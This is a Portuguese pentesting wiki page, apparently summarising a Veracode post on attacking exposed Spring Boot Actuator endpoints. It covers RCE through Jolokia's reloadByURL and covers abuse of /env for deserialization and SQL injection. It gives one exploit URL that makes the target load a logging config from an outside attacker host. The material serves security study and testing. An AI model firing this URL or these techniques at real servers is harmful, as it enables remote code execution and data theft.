Spring Actuators
Burla de Autenticação Spring
De https://raw.githubusercontent.com/Mike-n1/tips/main/SpringAuthBypass.png****
Explorando Spring Boot Actuators
Verifique a postagem original em [https://www.veracode.com/blog/research/exploiting-spring-boot-actuators]
Pontos Chave:
Os Actuators do Spring Boot registram endpoints como
/health
,/trace
,/beans
,/env
, etc. Nas versões de 1 a 1.4, esses endpoints são acessíveis sem autenticação. A partir da versão 1.5 em diante, apenas/health
e/info
são não sensíveis por padrão, mas os desenvolvedores frequentemente desabilitam essa segurança.Certos endpoints do Actuator podem expor dados sensíveis ou permitir ações prejudiciais:
/dump
,/trace
,/logfile
,/shutdown
,/mappings
,/env
,/actuator/env
,/restart
e/heapdump
.No Spring Boot 1.x, os actuators são registrados sob a URL raiz, enquanto no 2.x, eles estão sob o caminho base
/actuator/
.
Técnicas de Exploração:
Execução Remota de Código via '/jolokia':
O endpoint do actuator
/jolokia
expõe a Biblioteca Jolokia, que permite acesso HTTP aos MBeans.A ação
reloadByURL
pode ser explorada para recarregar configurações de log de uma URL externa, o que pode levar a XXE cego ou Execução Remota de Código via configurações XML manipuladas.URL de exploração de exemplo:
http://localhost:8090/jolokia/exec/ch.qos.logback.classic:Name=default,Type=ch.qos.logback.classic.jmx.JMXConfigurator/reloadByURL/http:!/!/artsploit.com!/logback.xml
.
Modificação de Configuração via '/env':
Se as Bibliotecas Spring Cloud estiverem presentes, o endpoint
/env
permite a modificação de propriedades ambientais.As propriedades podem ser manipuladas para explorar vulnerabilidades, como a vulnerabilidade de desserialização XStream no serviçoURL Eureka.
Exemplo de solicitação POST de exploração:
Outras Configurações Úteis:
Propriedades como
spring.datasource.tomcat.validationQuery
,spring.datasource.tomcat.url
espring.datasource.tomcat.max-active
podem ser manipuladas para vários exploits, como injeção de SQL ou alteração de strings de conexão de banco de dados.
Informações Adicionais:
Uma lista abrangente de actuators padrão pode ser encontrada aqui.
O endpoint
/env
no Spring Boot 2.x usa formato JSON para modificação de propriedades, mas o conceito geral permanece o mesmo.
Tópicos Relacionados:
RCE Env + H2:
Detalhes sobre a exploração da combinação do endpoint
/env
e do banco de dados H2 podem ser encontrados aqui.
SSRF no Spring Boot Através da Interpretação Incorreta de Nomes de Caminho:
O tratamento de parâmetros de matriz (
;
) do framework Spring em nomes de caminho HTTP pode ser explorado para Solicitação de Servidor-Side Request Forgery (SSRF).Exemplo de solicitação de exploração:
Last updated